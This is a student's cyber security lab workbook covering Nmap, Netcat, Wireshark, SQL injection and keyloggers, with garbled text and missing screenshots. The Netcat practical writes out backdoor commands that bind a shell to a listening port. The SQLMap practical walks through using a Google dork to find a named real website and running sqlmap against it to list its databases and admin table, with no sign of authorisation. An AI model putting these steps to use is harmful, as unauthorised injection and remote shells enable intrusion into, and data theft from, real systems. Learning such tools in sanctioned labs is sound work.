Cyber Security(3150714) 221170107010

Practical-1

Install Kali Linux. Examine the utilities and tools available in kali linux and
find out which tool is the best for finding cyber attack/vulnerability.

Best tool in kali linux for finding cyber attack/vulnerability:

Nmap:

Nmap, short for Network Mapper, is a free, open-source tool for

vulnerability scanning and network discovery. Network administrators use
Nmap to identify what devices are running on their systems, discovering
hosts that are available and the services they offer, finding open ports
and detecting security risks.

Nmap can be used to monitor single hosts as well as vast networks that
encompass hundreds of thousands of devices and multitudes of subnets.

Though Nmap has evolved over the years and is extremely flexible, at heart
it's a port-scan tool, gathering information by sending raw packets to
system ports. It listens for responses and determines whether ports are
open, closed or filtered in some way by, for example, a firewall. Other terms
used for port scanning include port discovery or enumeration.
Cyber Security(3150714) 221170107010

Wireshark:
Wireshark is the world's leading network traffic analyzer, and an essential tool for any
security professional or systems administrator. This free software lets you analyze
network traffic in real time, and is often the best tool for troubleshooting issues on
your network.

Common problems that Wireshark can help troubleshoot include dropped packets,
latency issues, and malicious activity on your network. It lets you put your network
traffic under a microscope, and provides tools to filter and drill down into that traffic,
zooming in on the root cause of the problem. Administrators use it to identify faulty
network appliances that are dropping packets, latency issues caused by machines
routing traffic halfway around the world, and data exfiltration or even hacking
attempts against your organization.

WPscan:
WPScan is an open source WordPress security scanner. You can use it to scan your
WordPress website for known vulnerabilities within the WordPress core, as well as
popular WordPress plugins and themes.

Since it is a WordPress black box scanner, it mimics a real attacker. This means it does
not rely on any sort of access to your WordPress dashboard or source code to conduct
the tests. In other words, if WPScan can find a vulnerability in your
WordPress website, so can an attacker.
Cyber Security(3150714) 221170107010

Practical-2
Evaluate network defence tools and for following
1. IP spoofing
2. DOS attack

IP spoofing:
IP spoofing is the creation of Internet Protocol (IP) packets which have a modified source
address in order to either hide the identity of the sender, to impersonate another computer
system, or both. It is a technique often used by bad actors to invoke DDos against a target
device or the surrounding infrastructure.

IP Spoofing is essentially a technique used by hackers to gain unauthorized access to

Computers. Concepts of IP Spoofing was initially discussed in academic circles as early as
Cyber Security(3150714) 221170107010

1980. IP Spoofing types of attacks , had been known to Security expert on the theoretical
level. It was primarily theoretical until Robert Morris discovered a security weakness in the
tcp control known as sequence prediction. Occasionally IP spoofing is done to mask the
origins of a Dos attack. In fact Dos attack often ask actual IP address from where the attack
has originated from.

Process :
With IP spoofing, intruder sends message to a computer system with an IP address indicating
message is coming from a different IP address than its actually coming from. If intent is to
gain unauthorized access, then Spoof IP address will be that of a system the target considers
a trusted host. To Successfully perpetrate an IP Spoofing attack, hacker must find IP address
of a machine that the target System
Considers a trusted source. Hackers might employ a variety of techniques to find an IP
address of a trusted host. After they have obtained trusted IP address they can then modify
packet headers of their transmission so its appears that the packet coming from the host.

Different ways to address IP Spoofing include :

1. Do not reveal any information regarding your internal IP addresses.This helps prevent
those addresses from being “spoofed”.
2. Monitor incoming IP packets for signs of IP spoofing using network monitoring
software. One popular product is “Netlog”, is along side similar products, seeks
incoming packets to the external interface that have the both source and
destination IP addresses in your local domain. This essentially means an incoming
packet that claims to be from inside network is actually coming from outside your
network. Finding one means that an attack is underway.
Danger that IP spoofing contains is that some firewalls do not examine packets that
appear to come from an internal IP address.Routing packets through filtering router is
possible, if they are not configured to filter incoming packets whose source address is in
local domain.

Examples of router configurations that are potentially vulnerable include :

1. Routers to external networks that support multiple internal interfaces.

2. Proxy firewalls where the proxy applications use source IP address for
authentication.
3. Router with two interfaces support sub-netting on the internal network.
4. Routers that do not filter packets whose source address is in the local domain.
Cyber Security(3150714) 221170107010

DOS attack:
Imagine a scenario where you are visiting some websites and one of them seems to be a

little slow. You might blame their servers to improve their scalability as they might be

experiencing a lot of user traffic on their site. Most of the sites already take this issue into

account beforehand. Chances are, they might be a victim of what is known as DDoS attack,

Distributed Denial of Service Attack.

In DDoS attacks, the attacker tries to make a particular service unavailable by directing

continuous and huge traffic from multiple end systems. Due to this enormous traffic, the

network resources get utilised in serving requests of those false end systems such that a

legitimate user is unable to access the resources for himself/herself.

Types of DDoS attacks –

DDoS attacks can be divided into three major categories:

1. Application layer attacks –

These attacks focus on attacking the layer 7 of the OSI model where the
webpages are generated in response to the request initiated by the end user.
For a client, generating a request does not take any heavy load and it can easily
generate multiple requests to the server. On the other hand, responding to a
request takes considerable load for the server as it has to build all the pages,
compute any queries and load the results from the database according to the
request.

Examples: HTTP Flood attack and attack on DNS Services.

2. Protocol attacks –

They are also known as state-exhaustion attacks. These attacks focus on vulnerabilities in
the layer 3 and layer 4 of the protocol stack. These types of attacks consume resources like
serves, firewalls and load balancers.
Examples: SYN Flood attack and Ping of Death.
Cyber Security(3150714) 221170107010

3. Volumetric attacks –

Volumetric attacks focus on consuming the network bandwidth and saturating it by

amplification or botnet to hinder its availability to the users. They are easy to generate by
directing massive amount of traffic to the target server.
Examples:NTP Amplification, DNS Amplification, UDP Flood attack and TCP Flood attack.

Common DDoS attacks –

1. SYN Flood attack –

A SYN Flood attack works in a similar way a mischievous child keeps on ringing
the door bell (request) and running away. The old person inside comes out,
opens the door and does not see anyone (no response). Ultimately, after
frequent such scenarios, the old person gets exhausted and does not answer
even genuine people. A SYN attack exploits TCP Handshake by sending out SYN
messages with a spoofed IP address. The victim server keeps on responding but
does not receive final acknowledgement.
Cyber Security(3150714) 221170107010

HTTP flood attack –

In HTTP Flood attack, multiple HTTP requests are generated simultaneously against a target
server. This leads to exhaustion of network resources of that server and thus fails to serve
actual users’ requests. The variations of HTTP Flood attacks are – HTTP GET attack and HTTP
POST attack.

DNS amplification –

Assume a scenario where you call pizza hut and ask them to call you back on a number and
tell all the combinations of pizzas they have along with the toppings and deserts. You
generated a large output with a very small input. But, the catch is the number you gave
them is not yours. Similarly, DNS Amplification works by requesting a DNS server from a
spoofed IP address and structuring your request so that the
DNS server responds with a large amount of data to the target victim.
Cyber Security(3150714) 221170107010
Cyber Security(3150714) 221170107010

Practical-3
EXPLORE THE NMAP TOOL AND LIST HOW IT CAN BE USED FOR
NETWORK DEFENCE.

Nmap is a free open source tool, employed to discover hosts and services on a
computer network by sending packets and analyzing the retrieved responses. Nmap
offers some features for probing computer networks, including host discovery and
service and operating system detection.

● Nmap can provide further information on targets, including reverse DNS

names, device types, and MAC addresses.
● Host discovery – Identifying hosts on a network. For example, listing the hosts
that respond to TCP and/or ICMP requests or have a particular port open.
● Port scanning – Enumerating the open ports on target hosts.
● OS detection – Determining the operating system and hardware
characteristics of network devices.
● Version detection – Interrogating network services on remote devices to
determine the application name and version number.
● Scriptable interaction with the target support using the Nmap Scripting Engine
(NSE)

Usage of Nmap
● Auditing the security of a device or firewall by identifying the network
connections which can be made to, or through it.
● Identifying open ports on a target host in preparation for auditing.
● Network inventory, network mapping, and maintenance and asset
management.
● Auditing the security of a network by identifying new servers.
● Generating traffic to hosts on a network, response analysis and response time
measurement.
● Finding and exploiting vulnerabilities in a network.
● DNS queries and subdomain search

Nmap – How it can be used for network defense.

Nmap ("Network Mapper") is an open source tool for network exploration and
security auditing. It was designed to rapidly scan large networks, although it works
fine against single hosts. Nmap uses raw IP packets in novel ways to determine what
Cyber Security(3150714) 221170107010

hosts are available on the network, what services (application name and version)
those hosts are offering, what operating systems (and OS versions) they are running,
what type of packet filters/firewalls are in use, and dozens of other characteristics.
While Nmap is commonly used for security audits, many systems and network
administrators find it useful for routine tasks such as network inventory, managing
service upgrade schedules, and monitoring host or service uptime.

The output from Nmap is a list of scanned targets, with supplemental information on
each depending on the options used. Key among that information is the "interesting
ports table". That table lists the port number and protocol, service name, and state.
The state is either open, filtered, closed, or unfiltered. Open means that an
application on the target machine is listening for connections/packets on that port.
Filtered means that a firewall, filter, or other network obstacle is blocking the port so
that Nmap cannot tell whether it is open or closed. Closed ports have no application
listening on them, though they could open up at any time. Ports are classified as
unfiltered when they are responsive to Nmap's probes, but Nmap cannot determine
whether they are open or closed. Nmap reports the state combinations open|filtered
and closed|filtered when it cannot determine which of the two states describe a
port. The port table may also include software version details when version detection
has been requested. When an IP protocol scan is requested (-sO), Nmap provides
information on supported IP protocols rather than listening ports.

In addition to the interesting ports table, Nmap can provide further information on
targets, including reverse DNS names, operating system guesses, device types, and
MAC addresses. A typical Nmap scan is shown in Example 1. The only Nmap
arguments used in this example are -A, to enable OS and version detection, script
scanning, and traceroute; -T4 for faster execution; and then the hostname.

Example 1. A representative Nmap scan

# nmap -A -T4 scanme.nmap.org

Nmap scan report for scanme.nmap.org (74.207.244.221) Host is

up (0.029s latency). rDNS record for 74.207.244.221: li86-
221.members.linode.com Not shown: 995 closed ports
PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0) | ssh-hostkey:
1024 8d:60:f1:7c:ca:b7:3d:0a:d6:67:54:9d:69:d9:b9:dd (DSA)
|_2048 79:f8:09:ac:d4:e2:32:42:10:49:d3:bd:20:82:85:ec (RSA)
80/tcp open http Apache httpd 2.2.14 ((Ubuntu)) |_http-title: Go
ahead and ScanMe!
Cyber Security(3150714) 221170107010

646/tcp filtered ldp

1720/tcp filtered H.323/Q.931
9929/tcp open nping-echo Nping
echo Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.39
OS details: Linux 2.6.39 Network
Distance: 11 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

TRACEROUTE (using port 53/tcp)

HOP RTT ADDRESS
[Cut first 10 hops for brevity]
11 17.65 ms li86-221.members.linode.com (74.207.244.221)

Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

Various options that can be passed to Nmap:

TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL <inputfilename>: Input from list of hosts/networks
-iR <num hosts>: Choose random targets
--exclude <host1[,host2][,host3],...>: Exclude hosts/networks
--excludefile <exclude_file>: Exclude list from file
HOST DISCOVERY:
-sL: List Scan - simply list targets to scan
-sn: Ping Scan - disable port scan
-Pn: Treat all hosts as online -- skip host discovery
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO[protocol list]: IP Protocol Ping
-n/-R: Never do DNS resolution/Always resolve [default: sometimes]

--dns-servers <serv1[,serv2],...>: Specify custom DNS servers

Cyber Security(3150714) 221170107010

--system-dns: Use OS's DNS resolver --

traceroute: Trace hop path to each host SCAN
TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sU: UDP
Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags <flags>: Customize TCP scan flags
-sI <zombie host[:probeport]>: Idle scan
-sY/sZ: SCTP INIT/COOKIE-ECHO scans
-sO: IP protocol scan
-b <FTP relay host>: FTP bounce scan
PORT SPECIFICATION AND SCAN ORDER:
-p <port ranges>: Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9 --exclude-ports
<port ranges>: Exclude the specified ports from scanning -F: Fast mode - Scan
fewer ports than the default scan -r: Scan ports consecutively - don't randomize
--top-ports <number>: Scan <number> most common ports --port-
ratio <ratio>: Scan ports more common than <ratio> SERVICE/VERSION
DETECTION:
-sV: Probe open ports to determine service/version info --version-
intensity <level>: Set from 0 (light) to 9 (try all probes) --version-light:
Limit to most likely probes (intensity 2) --version-all: Try every single
probe (intensity 9)
--version-trace: Show detailed version scan activity (for debugging) SCRIPT
SCAN:
-sC: equivalent to --script=default
--script=<Lua scripts>: <Lua scripts> is a comma separated list of
directories, script-files or script-categories
--script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts
--script-args-file=filename: provide NSE script args in a file --
script-trace: Show all data sent and received --script-updatedb:
Update the script database.
--script-help=<Lua scripts>: Show help about scripts.
<Lua scripts> is a comma-separated list of script-files or script-
categories.
OS DETECTION:
-O: Enable OS detection
--osscan-limit: Limit OS detection to promising targets
--osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
Options which take <time> are in seconds, or append 'ms' (milliseconds),
Cyber Security(3150714) 221170107010

's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m). -T<0-
5>: Set timing template (higher is faster) --min-hostgroup/max-
hostgroup <size>: Parallel host scan group sizes --min-parallelism/max-
parallelism <numprobes>: Probe parallelization
--min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies probe round
trip time.
--max-retries <tries>: Caps number of port scan probe retransmissions.
--host-timeout <time>: Give up on target after this long
--scan-delay/--max-scan-delay <time>: Adjust delay between probes --min-rate
<number>: Send packets no slower than <number> per second --max-rate
<number>: Send packets no faster than <number> per second FIREWALL/IDS
EVASION AND SPOOFING:
-f; --mtu <val>: fragment packets (optionally w/given MTU) -D
<decoy1,decoy2[,ME],...>: Cloak a scan with decoys
-S <IP_Address>: Spoof source address
-e <iface>: Use specified interface
-g/--source-port <portnum>: Use given port number
--proxies <url1,[url2],...>: Relay connections through HTTP/SOCKS4 proxies --data
<hex string>: Append a custom payload to sent packets --data-string <string>:
Append a custom ASCII string to sent packets --data-length <num>: Append
random data to sent packets --ip-options <options>: Send packets with specified
ip options --ttl <val>: Set IP time-to-live field
--spoof-mac <mac address/prefix/vendor name>: Spoof your MAC
address --badsum: Send packets with a bogus TCP/UDP/SCTP checksum
OUTPUT: -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt
kIddi3, and Grepable format, respectively, to the given filename. -oA
<basename>: Output in the three major formats at once -v: Increase
verbosity level (use -vv or more for greater effect) -d: Increase debugging
level (use -dd or more for greater effect) --reason: Display the reason a
port is in a particular state --open: Only show open (or possibly open)
ports
--packet-trace: Show all packets sent and received
--iflist: Print host interfaces and routes (for debugging)
--append-output: Append to rather than clobber specified output files
--resume <filename>: Resume an aborted scan
--stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML --
webxml: Reference stylesheet from Nmap.Org for more portable XML --no-
stylesheet: Prevent associating of XSL stylesheet w/XML output MISC:
-6: Enable IPv6 scanning
-A: Enable OS detection, version detection, script scanning, and traceroute
Cyber Security(3150714) 221170107010

--datadir <dirname>: Specify custom Nmap data file location

--send-eth/--send-ip: Send using raw ethernet frames or IP packets
--privileged: Assume that the user is fully privileged
--unprivileged: Assume the user lacks raw socket privileges -V:
Print version number
-h: Print this help summary page.
EXAMPLES:
nmap -v -A scanme.nmap.org nmap -
v -sn 192.168.0.0/16 10.0.0.0/8 nmap
-v -iR 10000 -Pn -p 80

Everything on the Nmap command-line that isn't an option (or option argument) is
treated as a target host specification. The simplest case is to specify a target IP
address or hostname for scanning.
When a hostname is given as a target, it is resolved via the Domain Name System
(DNS) to determine the IP address to scan. If the name resolves to more than one IP
address, only the first one will be scanned. To make Nmap scan all the resolved
addresses instead of only the first one, use the --resolve-all option.

Sometimes you wish to scan a whole network of adjacent hosts. For this, Nmap
supports CIDR-style addressing. You can append /numbits to an IP address or
hostname and Nmap will scan every IP address for which the first numbits are the
same as for the reference IP or hostname given. For example, 192.168.10.0/24 would
scan the 256 hosts between 192.168.10.0 (binary: 11000000 10101000 00001010
00000000) and 192.168.10.255 (binary: 11000000 10101000 00001010 11111111),
inclusive. 192.168.10.40/24 would scan exactly the same targets. Given that the host
scanme.nmap.org is at the IP address 64.13.134.52, the specification
scanme.nmap.org/16 would scan the 65,536 IP addresses between 64.13.0.0 and
64.13.255.255. The smallest allowed value is /0, which targets the whole Internet.
The largest value for IPv4 is /32, which scans just the named host or IP address
because all address bits are fixed. The largest value for IPv6 is /128, which does the
same thing.
Cyber Security(3150714) 221170107010

EXAMPLES:

1. Scan using Hostname

2. Scan using IP Address

Cyber Security(3150714) 221170107010

3. Scan using “-v” option

Cyber Security(3150714) 221170107010

4. Scan OS information and Traceroute

Cyber Security(3150714) 221170107010

5. Enable OS Detection with Nmap

Cyber Security(3150714) 221170107010

6. Scan a Host to Detect Firewall

7. Find out Live hosts in a Network

Cyber Security(3150714) 221170107010

Practical-4
Explore the NetCat tool:

Netcat or NC is a utility tool that uses TCP and UDP connections to read and write in a

network. It can be used for both attacking and security. In the case of attacking. It helps us

to debug the network along with investing it. It runs on all operating systems.
Cyber Security(3150714) 221170107010

Getting Started with Netcat

To start NC, the most basic option we can use the help command. This will show us all the

options that we can use with Netcat. The help command is the following one: nc -h

Connecting to a Server

Here, we have connected FTP Server with the IP Address 192.168.1.6. To connect to the

server at a specific port where a particular service running. In our case, the port is 21

i.e. FTP.

Syntax: nc [Target IP Address] [Target Port] nc

192.168.17.43 21

Chatting
Netcat can also be used to chat between two users. We need to establish a connection
before chatting. To do this we are going to need two devices. One will play the role of
initiator and one will be a listener to start the conversation and so once the connection is
established, communication can be done from both ends.First of all we will use windows 10
machine which will play role of
Listener.Second we will use Kali linux machine which will play role of initiator. First, we
will have to create a listener. We will use the following command to create a listener: nc -
lvvp 4444 where,
[-l]: Listen Mode
[vv]: Verbose Mode {It can be used once, but we use twice to be more verbose}
[p]: Local Port
ow, it’s time to create an initiator, for this we will just provide the IP Address of the
System where we started the Listener followed by the port number.
Creating a backdoor

We can also create a backdoor using NC. To create a backdoor on the target system that we

can come back to at any time. Command for attacking a Linux System. nc -l -p 2222 -e

/bin/bash

For Creating Backdoor for windows system. nc -l -p

1337 -e hack.exe
Cyber Security(3150714) 221170107010

This will open a listener on the system that will pipe the command shell or the Linux bash

shell to the connecting system. nc 192.168.1.35 2222

Verbose mode

In netcat, Verbose is a mode which can be initiated using [-v] parameter. Now verbose mode

generates extended information. Basically, we will connect to a server using netcat two

times to see the difference between normal and verbose mode.

The command is nc 192.168.17.43 21 -v

Save Output to Desktop

For the purpose of the record maintenance, better readability and future references, we
will save the output of the Netcat. To do this we will use the parameter -o of the Netcat to
save the output in the text file. nc 192.168.17.43 21 -v -o /root/Desktop/Result.txt

File Transfer
Netcat can be used to transfer the file across devices. Here we will create a scenario where
we will transfer a file from a windows system to Kali Linux system. To send the file from
the Windows, we will use the following command. nc -v -w 20 -p 8888 -l file.txt

Practical-5

Use a wireshark tool and explore the packet format and content at each
OSI layer.
What is Wireshark?

Wireshark is a network packet analyzer. A network packet analyzer presents

captured packet data in as much detail as possible.

You could think of a network packet analyzer as a measuring device for examining
what’s happening inside a network cable, just like an electrician uses a voltmeter for
examining what’s happening inside an electric cable (but at a higher level, of
course).

In the past, such tools were either very expensive, proprietary, or both. However,

with the advent of Wireshark, that has changed. Wireshark is available for free,
Cyber Security(3150714) 221170107010

is open source, and is one of the best packet analyzers available today Here are

some reasons people use Wireshark:

● Network administrators use it to troubleshoot network problems

● Network security engineers use it to examine security problems

● QA engineers use it to verify network applications

● Developers use it to debug protocol implementations

● People use it to learn network protocol internals

Wireshark can also be helpful in many other situations.

The following are some of the many features Wireshark provides:

● Available for UNIX and Windows.

● Capture live packet data from a network interface.

● Open files containing packet data captured with tcpdump/WinDump,

Wireshark, and many other packet capture programs.

● Import packets from text files containing hex dumps of packet data.

● Display packets with very detailed protocol information.

● Save packet data captured.

● Export some or all packets in a number of capture file formats.

● Filter packets on many criteria.

● Search for packets on many criteria.

● Colorize packet display based on filters.

● Create various statistics.

Wireshark captures packets and lets you examine their contents.

Cyber Security(3150714) 221170107010

Open Source Software

Wireshark is an open source software project, and is released under the
GNU,GPL. You can freely use Wireshark on any number of computers you like,
without worrying about license keys or fees or such. In addition, all source code
is freely available under the GPL. Because of that, it is very easy for people to
add new protocols to Wireshark, either as plugins, or built into the source, and
they often do!

● Wireshark isn’t an intrusion detection system. It will not warn you when
someone does strange things on your network that he/she isn’t allowed to
do. However, if strange things happen, Wireshark might help you figure out
what is really going on.
Cyber Security(3150714) 221170107010

● Wireshark will not manipulate things on the network, it will only “measure”
things from it. Wireshark doesn’t send packets on the network or do other
active things (except domain name resolution, but that can be disabled).

you can get the latest copy of the program from the Wireshark website at
https://www.wireshark.org/download.html. The download page should automatically
highlight the appropriate download for your platform and direct you to the nearest
mirror. Official Windows and macOS installers are signed by the Wireshark
Foundation.

Common Wireshark Use Cases

Here’s a common example of how a Wireshark capture can assist in identifying a
problem. The figure below shows an issue on a home network, where the internet
connection was very slow.

As the figure shows, the router thought a common destination was unreachable. This
was discovered by drilling down into the IPv6 Internet Message Control Protocol
(ICMP) traffic, which is marked in black. In Wireshark, any packet marked in black is
considered to reflect some sort of issue.

In this case, Wireshark helped determine that the router wasn’t working properly and
couldn’t find YouTube very easily. The problem was resolved by restarting the cable
modem. Of course, while this particular problem didn’t necessitate using Wireshark,
it’s kind of cool to authoritatively finalize the issue.

This shows the innards of a TCP packet that is part of a transport layer security
(TLS) conversation. This is a great example of how you can drill down into the
captured packet.

Using Wireshark doesn’t allow you to read the encrypted contents of the packet, but
you can identify the version of TLS the browser and YouTube are using to encrypt
Cyber Security(3150714) 221170107010

things. Interestingly enough, the encryption shifted to TLS version 1.2 during the
listening.

Wireshark is often used to identify more complex network issues. For example, if a
network experiences too many retransmissions, congestion can occur. By using
Wireshark, you can identify specific retransmission issues, as shown below in
Figure.
Cyber Security(3150714) 221170107010

How to Capture Packets Using Wireshark

Once you’ve installed Wireshark, you can start grabbing network traffic. But
remember: To capture any packets, you need to have proper permissions on your
computer to put Wireshark into promiscuous mode.

○ In a Windows system, this usually means you have administrator

access.
○ In a Linux system, it usually means that you have root access. As
long as you have the right permissions, you have several options to actually start
the capture. Perhaps the best is to select Capture >> Options from the main
window. This will bring up the Capture Interfaces window, as shown below in Figure.
Cyber Security(3150714) 221170107010

For this example, we’ll select the Ethernet 3 interface, which is the most active
interface. Wireshark visualizes the traffic by showing a moving line, which represents
the packets on the network.
Once the network interface is selected, you simply click the Start button to begin your
capture. As the capture begins, it’s possible to view the packets that appear on the
screen, as shown in Figure below.
Cyber Security(3150714) 221170107010

In Wireshark, just go to Statistics >> I/O Graph, and you’ll see a graph similar to the
one shown in Figure .

This particular graph is showing typical traffic generated by a home office. The spikes
in the graph are bursts of traffic that were caused by generating DDOS attack using
a few Linux systems.
In this case, three major traffic bursts were generated. Many times, cybersecurity
pros use Wireshark as a quick and dirty way to identify traffic bursts during attacks.
It’s also possible to capture the amount of traffic generated between one system and
another. If you go to Statistics and then select Conversations, you will see a
summary of conversations between end points, as shown below in Figure .
Cyber Security(3150714) 221170107010

P
ractical-6
Examine SQL injection attack.

What is an SQL injection attack?

Structured Query Language (SQL) is a language designed to manipulate and manage data in
a database. Since its inception, SQL has steadily found its way into many commercial and
open source databases. SQL INJECTION (SQL) is a type of cyber security attack that targets
these databases using specifically crafted SQL statements to trick the systems into doing
unexpected and undesired things.

Actions a successful attacker may take on a compromised target include:

● Bypassing authentication

● Exfiltrating/stealing data

● Modifying or corrupting data

● Deleting data

● Running arbitrary code

● Gaining root access to the system itself

Cyber Security(3150714) 221170107010

Most database types (with the notable exception of Oracle) have a set of views called
the information schema which provide information about the database.

You can query information_schema.tables to list the tables in the database:

SELECT * FROM information_schema.tables

This returns output like the following:

TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE

=====================================================
MyDatabase dbo Products BASE TABLE

MyDatabase dbo Users BASE TABLE

MyDatabase dbo Feedback BASE TABLE

This output indicates that there are three tables, called Products, Users, and

Feedback.

You can then query information_schema.columns to list the columns in

individual tables:

SELECT * FROM information_schema.columns WHERE table_name =

'Users'

This returns output like the following:

TABLE_CATALOG TABLE_SCHEMA TABLE_NAME COLUMN_NAME DATA_TYPE

==============================================================
===

MyDatabase dbo Users UserId int

MyDatabase dbo Users Username varchar

MyDatabase dbo Users Password varchar

This output shows the columns in the specified table and the data type of each
column.
Cyber Security(3150714) 221170107010

Equivalent to information schema on Oracle

On Oracle, you can obtain the same information with slightly different queries.

You can list tables by querying all_tables:

SELECT * FROM all_tables

And you can list columns by querying all_tab_columns:

SELECT * FROM all_tab_columns WHERE table_name = 'USERS'

Practical-7

Perform sql injection with SQLMap on vulnerable website found

using google dorks.

Introduction about SQL injection:-

SQL injection is a code injection technique, used to attack data

driven applications, in which malicious SQL statements are

inserted into an entry field for execution (e.g. to dump the

database contents to the attacker). SQL injection must exploit a

security vulnerability in an application’s software, for example,

when user input is either incorrectly filtered for string literal

Cyber Security(3150714) 221170107010

escape characters embedded in SQL statements or user input is

not strongly typed and unexpectedly executed. SQL injection is

mostly known as an attack vector for websites but can be used to

attack any type of SQL databases. In this guide, I will show you

how to SQLMAP SQL Injection on Kali Linux to hack a website

(more specifically Database) and extract usernames and

passwords on Kali Linux.

SQLMAP:-

sqlmap is an open source penetration testing tool that

automates the process of detecting and exploiting SQL injection

flaws and taking over of database servers. It comes with a

powerful detection engine, many niche features for the ultimate

penetration tester and a broad range of switches lasting from

database fingerprinting, over data fetching from the database,

to
Cyber Security(3150714) 221170107010

accessing the underlying file system and executing commands

on the operating system via out-of-band connections.

Step 1: Find a Vulnerable website

We use Google Dork string to find Vulnerable SQLMAP

SQL injectable website.

We are going to use Google Dork string is “ inurl:index.php?id=

One of the search result show like this:

“ http://www.tunesoman.com/product.php?id=200 “
Cyber Security(3150714) 221170107010

Now just add a single quotation mark ‘ at the end of the URL

http://www.tunesoman.com/product.php?id=200’

If the page returns an SQL error, the page is vulnerable

to SQL injection.

See the example of sql error in below screenshot:-

Cyber Security(3150714) 221170107010

Step 2: Open SQLMAP

Open SQLMAP in the terminal, If you want to gain

more information about SQLMAP then type “sqlmap —

help” it will give you all the options which are used

while performing SQLMAP let’s see the screenshot

below

To determine the databases behind the web site then we

need to type on terminal

run this command against

http://www.tunesoman.com/product.php?id=200
Cyber Security(3150714) 221170107010

Notice that I have circled the two available databases,

information_schema and db363851433. Information schema is

included in every MySQL installation and it includes

information on all the objects in the MySQL instances, But not

data of interest. Although it can be beneficial to explore those

databases to find objects in all the databases in the instance, we

will focus our attention on the database here, db363851433 that

may have some valuable information. Let’s explore it further.

2.5 We can retrieve all the tables which are present in database

db363851433 by using following command

Cyber Security(3150714) 221170107010

sqlmap –u

http://www.tunesoman.com/product.php?id=200 –D

db363851433 –tables

Now I want to gain more information about admin_user

table then type the following command sqlmap –u

http://www.tunesoman.com/product.php?id=200 –D db363851433 –T admin_user

–columns
Cyber Security(3150714) 221170107010

Practical-8

Examine software keyloggers and hardware

keyloggers.
What is a keylogger? At its most basic definition, a keylogger is a function which records or
keystrokes on a computer. Taken at this basic level, a keylogger looks absolutely harmless. In
the hands of a hacker or a cybercriminal, a keylogger is a potent tool to steal away your
information. We'll talk about how a keylogger works, how cybercriminals install it on your
computer, and what you can do to avoid being a victim. You'll know what is a keylogger when
we're done.

WHY KEYLOGGERS ARE A THREAT

Keyloggers are a serious threat to users and the users' data, as they track the keystrokes to
intercept passwords and other sensitive information typed in through the keyboard. This gives
hackers the benefit of access to PIN codes and account numbers, passwords to online shopping
sites, email ids, email logins, and other confidential information, etc.

When the hackers get access to the users' private and sensitive information, they can take
advantage of the extracted data to perform online money transaction the user's account.
Keyloggers can sometimes be used as a spying tool to compromise business and state-owned
company's data.
Cyber Security(3150714) 221170107010

The main objective of keyloggers is to interfere in the chain of events that happen when a key is
pressed and when the data is displayed on the monitor as a result of a keystroke. A keylogger
can be done by introducing a wiring or a hardware bug in the keyboard, to achieve video
surveillance; terminating input and/or output; or by also implementing the use of a filter driver in
the keyboard stack; and demanding data from the user's keyboard using generalized
documented methods. There are two other rootkit methods used by hackers: masking in kernel
mode and masking in user mode.

HOW KEYLOGGERS SPREAD

● Keyloggers can be installed when a user clicks on a link or opens an attachment/file

from a phishing mail

● Keyloggers can be installed through webpage script. This is done by exploiting a

vulnerable browser and the keylogger is launched when the user visits the malicious
website.

● a keylogger can be installed when a user opens a file attached to an email

● a keylogger can be installed via a web page script which exploits a browser
vulnerability. The program will automatically be launched when a user visits an infected
site

● a keylogger can exploit an infected system and is sometimes capable to download

and install other malware to the system.

HOW HACKERS INSTALL A KEYLOGGER

A hacker employs a Trojan virus as a delivery tool to install a keylogger. But way before one is
downloaded onto your system, a hacker will use two different methods to get it into your
computer. And both ways involve your participation.

The first method involves phishing. Phishing is the act of faking an email from a legitimate
company to fish for passwords and credit card numbers. Sometimes, these emails contain
attachments which download programs stealthily into your computer once you click on them.

For the second method, the hacker researches on his intended victim beforehand in order to find
a weakness in her or his online habits. Let's say a hacker finds out the victim habitually visits
porn
Cyber Security(3150714) 221170107010

sites, the hacker might craft an email with a fake coupon for a membership into an exclusive
erotic website. Since this method targets a particular fondness of the victim, there's a large
chance of success that he or she will download the fake attachment, unknowingly installing the
keylogger.